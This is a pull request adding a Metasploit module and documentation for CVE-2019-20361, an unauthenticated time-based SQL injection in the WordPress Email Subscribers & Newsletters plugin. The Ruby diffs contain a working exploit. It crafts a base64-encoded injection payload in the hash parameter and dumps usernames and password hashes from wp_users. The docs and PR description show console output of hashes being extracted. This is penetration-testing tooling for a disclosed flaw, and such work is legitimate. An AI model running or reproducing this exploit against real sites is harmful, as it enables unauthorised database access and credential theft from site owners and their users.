### PR TITLE
Wordpress plugin: Email Subscribers & Newsletters sqli (CVE-2019-20361)

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
 Email Subscribers & Newsletters plugin contains an unauthenticated timebased SQL injection in
-versions before 4.3.1.  The vulnerable parameter is in the `hash` parameter.
+versions before 4.3.1.  The `hash` parameter is vulnerable to injection.
 
 All versions can be downloaded from [wordress.org](https://wordpress.org/plugins/email-subscribers/advanced/)
 or [4.2.2](https://downloads.wordpress.org/plugin/email-subscribers.4.2.2.zip)

--- a/documentation/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
 Email Subscribers & Newsletters plugin contains an unauthenticated timebased SQL injection in
-versions before 4.2.3.  The vulnerable parameter is in the `hash` parameter.
+versions before 4.3.1.  The vulnerable parameter is in the `hash` parameter.
 
 All versions can be downloaded from [wordress.org](https://wordpress.org/plugins/email-subscribers/advanced/)
 or [4.2.2](https://downloads.wordpress.org/plugin/email-subscribers.4.2.2.zip)

--- a/documentation/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.md
@@ -1,0 +1,63 @@
+## Vulnerable Application
+
+Email Subscribers & Newsletters plugin contains an unauthenticated timebased SQL injection in
+versions before 4.2.3.  The vulnerable parameter is in the `hash` parameter.
+
+All versions can be downloaded from [wordress.org](https://wordpress.org/plugins/email-subscribers/advanced/)
+or [4.2.2](https://downloads.wordpress.org/plugin/email-subscribers.4.2.2.zip)
+
+After install, simply activate the plug-in.  You may get a "80% done!" page, simply ignore it.
+
+## Verification Steps
+
+1. Install the plugin on wordpress.
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/wp_email_sub_news_sqli`
+1. Do: `set rhosts [ip]`
+1. Do: `set action [action]`
+1. Do: `run`
+
+## Options
+
+### ACTION: List Users
+
+This action lists `COUNT` users and password hashes.
+
+### COUNT
+
+If Action `List Users` is selected (default), this is the number of users to enumerate.
+The larger this list, the more time it will take.  Defaults to `1`.
+
+## Scenarios
+
+### Wordpress 5.4.2 with Email Subscribers & Newsletters 4.2.2 on Ubuntu 20.04 using MariaDB 10.3.22
+
+#### List Users
+
+```
+msf6 > use auxiliary/scanner/http/wp_email_sub_news_sqli 
+msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set count 3
+count => 3
+msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > run
+
+[*] Checking /wp-content/plugins/email-subscribers/readme.txt
+[*] Found version 4.2.2 in the plugin
+[+] Vulnerable version detected
+[*] {SQLi} Executing (select group_concat(yKaoA) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) yKaoA from wp_users limit 3) adO)
+[*] {SQLi} Time-based injection: expecting output of length 124
+[+] wp_users
+========
+
+ user_login  user_pass
+ ----------  ---------
+ admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
+ admin2      $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
+ editor      $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.rb
@@ -15,6 +15,8 @@ class MetasploitModule < Msf::Auxiliary
         info,
         'Name' => 'WordPress Email Subscribers and Newsletter Hash SQLi Scanner',
         'Description' => %q{
+          Email Subscribers & Newsletters plugin contains an unauthenticated timebased SQL injection in
+          versions before 4.3.1.  The vulnerable parameter is in the `hash` parameter.
         },
         'Author' =>
           [
@@ -47,7 +49,7 @@ class MetasploitModule < Msf::Auxiliary
       return
     end
 
-    checkcode = check_plugin_version_from_readme('email-subscribers', '4.2.4')
+    checkcode = check_plugin_version_from_readme('email-subscribers', '4.3.1')
     if checkcode == Msf::Exploit::CheckCode::Safe
       vprint_error('Loginizer version not vulnerable')
       return

--- a/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.rb
@@ -1,0 +1,102 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::SQLi
+  require 'metasploit/framework/hashes/identify'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Email Subscribers and Newsletter Hash SQLi Scanner',
+        'Description' => %q{
+        },
+        'Author' =>
+          [
+            'h00die', # msf module
+            'red0xff', # sqli libs in msf
+            'Wordfence' # blog post says team, no individual(s) called out for discovery
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            [ 'EDB', '48699' ],
+            [ 'CVE', '2019-20361' ],
+            [ 'URL', 'https://www.wordfence.com/blog/2019/11/multiple-vulnerabilities-patched-in-email-subscribers-newsletters-plugin/' ]
+          ],
+        'Actions' => [
+          ['List Users', 'Description' => 'Queries username, password hash for COUNT users'],
+        ],
+        'DefaultAction' => 'List Users',
+        'DisclosureDate' => '2019-11-13'
+      )
+    )
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of users to enumerate', 1])
+    ]
+  end
+
+  def run_host(ip)
+    unless wordpress_and_online?
+      vprint_error('Server not online or not detected as wordpress')
+      return
+    end
+
+    checkcode = check_plugin_version_from_readme('email-subscribers', '4.2.4')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      vprint_error('Loginizer version not vulnerable')
+      return
+    else
+      print_good('Vulnerable version detected')
+    end
+
+    guid = Rex::Text.rand_guid
+    email = "#{Rex::Text.rand_text_alpha(8)}@#{Rex::Text.rand_text_alpha(8)}.com"
+
+    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
+      data = %Q|{"contact_id":"100','100','100','3'),('1594999398','1594999398','1',(1) AND #{payload},'100','100','3'),|
+      data << %Q|('1594999398','1594999398','1','100","campaign_id":"100","message_id":"100","email":"#{email}","guid":"#{guid}","action":"open"}|
+
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path),
+        'vars_get' => {
+          'hash' => Base64.encode64(data),
+          'es' => 'open',
+        }
+      })
+      fail_with Failure::Unreachable, 'Connection failed' unless res
+    end
+    unless @sqli.test_vulnerable
+      print_bad("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
+      return
+    end
+
+    columns = ['user_login', 'user_pass']
+    results = @sqli.dump_table_fields('wp_users', columns, '', datastore['COUNT'])
+    table = Rex::Text::Table.new('Header' => 'wp_users', 'Indent' => 1, 'Columns' => columns)
+    results.each do |user|
+      create_credential({
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: user[0],
+        private_type: :nonreplayable_hash,
+        jtr_format: identify_hash(user[1]),
+        private_data: user[1],
+        service_name: 'Wordpress',
+        address: ip,
+        port: datastore['RPORT'],
+        protocol: 'tcp',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      })
+      table << user
+    end
+    print_good(table.to_s)
+  end
+end

--- a/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.rb
@@ -59,15 +59,15 @@ class MetasploitModule < Msf::Auxiliary
     email = "#{Rex::Text.rand_text_alpha(8)}@#{Rex::Text.rand_text_alpha(8)}.com"
 
     @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
-      data = %Q|{"contact_id":"100','100','100','3'),('1594999398','1594999398','1',(1) AND #{payload},'100','100','3'),|
-      data << %Q|('1594999398','1594999398','1','100","campaign_id":"100","message_id":"100","email":"#{email}","guid":"#{guid}","action":"open"}|
+      data = %|{"contact_id":"100','100','100','3'),('1594999398','1594999398','1',(1) AND #{payload},'100','100','3'),|
+      data << %|('1594999398','1594999398','1','100","campaign_id":"100","message_id":"100","email":"#{email}","guid":"#{guid}","action":"open"}|
 
       res = send_request_cgi({
         'method' => 'GET',
         'uri' => normalize_uri(target_uri.path),
         'vars_get' => {
-          'hash' => Base64.encode64(data),
-          'es' => 'open',
+          'hash' => Base64.strict_encode64(data),
+          'es' => 'open'
         }
       })
       fail_with Failure::Unreachable, 'Connection failed' unless res

--- a/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
         'Name' => 'WordPress Email Subscribers and Newsletter Hash SQLi Scanner',
         'Description' => %q{
           Email Subscribers & Newsletters plugin contains an unauthenticated timebased SQL injection in
-          versions before 4.3.1.  The vulnerable parameter is in the `hash` parameter.
+          versions before 4.3.1.  The hash parameter is vulnerable to injection.
         },
         'Author' =>
           [
@@ -45,17 +45,14 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     unless wordpress_and_online?
-      vprint_error('Server not online or not detected as wordpress')
-      return
+      fail_with Failure::NotVulnerable, 'Server not online or not detected as wordpress'
     end
 
     checkcode = check_plugin_version_from_readme('email-subscribers', '4.3.1')
     if checkcode == Msf::Exploit::CheckCode::Safe
-      vprint_error('Loginizer version not vulnerable')
-      return
-    else
-      print_good('Vulnerable version detected')
+      fail_with Failure::NotVulnerable, 'Email subscribers and newsletter version not vulnerable'
     end
+    print_good('Vulnerable version detected')
 
     guid = Rex::Text.rand_guid
     email = "#{Rex::Text.rand_text_alpha(8)}@#{Rex::Text.rand_text_alpha(8)}.com"
@@ -75,8 +72,7 @@ class MetasploitModule < Msf::Auxiliary
       fail_with Failure::Unreachable, 'Connection failed' unless res
     end
     unless @sqli.test_vulnerable
-      print_bad("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
-      return
+      fail_with Failure::PayloadFailed, "#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay."
     end
 
     columns = ['user_login', 'user_pass']

--- a/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_email_sub_news_sqli.rb
@@ -49,13 +49,13 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     checkcode = check_plugin_version_from_readme('email-subscribers', '4.3.1')
-    if checkcode == Msf::Exploit::CheckCode::Safe
+    unless [Msf::Exploit::CheckCode::Vulnerable, Msf::Exploit::CheckCode::Appears, Msf::Exploit::CheckCode::Detected].include?(checkcode)
       fail_with Failure::NotVulnerable, 'Email subscribers and newsletter version not vulnerable'
     end
     print_good('Vulnerable version detected')
 
     guid = Rex::Text.rand_guid
-    email = "#{Rex::Text.rand_text_alpha(8)}@#{Rex::Text.rand_text_alpha(8)}.com"
+    email = Rex::Text.rand_mail_address
 
     @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
       data = %|{"contact_id":"100','100','100','3'),('1594999398','1594999398','1',(1) AND #{payload},'100','100','3'),|


### PR DESCRIPTION
This PR adds a module and docs for CVE-2019-20361, a time based sqli in wordpress plugin Email Subscribers & Newsletters < 4.3.1

## Verification

- [x] Install the plugin on wordpress.
- [x] Start msfconsole
- [x] Do: `use auxiliary/scanner/http/wp_email_sub_news_sqli`
- [x] Do: `set rhosts [ip]`
- [x] Do: `set action [action]`
- [x] Do: `run`

```
msf6 > use auxiliary/scanner/http/wp_email_sub_news_sqli 
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set count 3
count => 3
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > set verbose true
verbose => true
msf6 auxiliary(scanner/http/wp_email_sub_news_sqli) > run
[*] Checking /wp-content/plugins/email-subscribers/readme.txt
[*] Found version 4.2.2 in the plugin
[+] Vulnerable version detected
[*] {SQLi} Executing (select group_concat(yKaoA) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) yKaoA from wp_users limit 3) adO)
[*] {SQLi} Time-based injection: expecting output of length 124
[+] wp_users
========
 user_login  user_pass
 ----------  ---------
 admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
 admin2      $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
 editor      $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```